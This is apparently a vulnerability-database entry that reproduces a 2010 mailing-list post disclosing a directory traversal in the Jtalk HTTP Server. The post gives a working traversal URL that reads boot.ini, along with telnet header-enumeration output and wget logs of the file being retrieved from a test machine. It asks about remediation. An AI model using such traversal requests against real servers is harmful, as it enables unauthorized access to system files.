Jtalk HTTP Server directory traversal

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050521 漏洞类型
发布时间 2010-07-02 更新时间 2010-07-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070014
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello All,

Does anyone know of any Directory Traversal issue with Jtalk HTTP server?

I was testing one of my machine and found directory traversal on it.
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini

Tried to enumerate the version but failed, attached below are the logs -
=============Header enumeration=============
[jt@secBox]$ telnet 192.168.10.120 80
Trying 192.168.10.120...
Connected to 192.168.10.120 (192.168.10.120).
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 404 Not Found
Server: JTALKServer
Allow: GET
Content-Type: text/html
Content-Length:87

<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>HTTP Error 404</H1>
<H4>Not Found</H4>
</BODY>
</HTML>Connection closed by foreign host.
==============End Header Enumeration===============


Attached below are the logs for wget when I downloaded the boot.ini file

=========wget logs==============
[jt@secBox]$ wget
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
--2010-06-30 15:58:45--
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
Connecting to 192.168.10.120:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208 [application/octet-stream]
Saving to: `boot.ini'

100%[====================================================================================================================>]
208         --.-K/s   in 0s

2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208]

[jt@secBox]$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard"
/noexecute=optout /fastdetect
[jt@secBox]$

============end of logs=====================


So my question is does anyone know of any such issue? What could be the
remediation apart from disabling the service?

Thanks
Joshua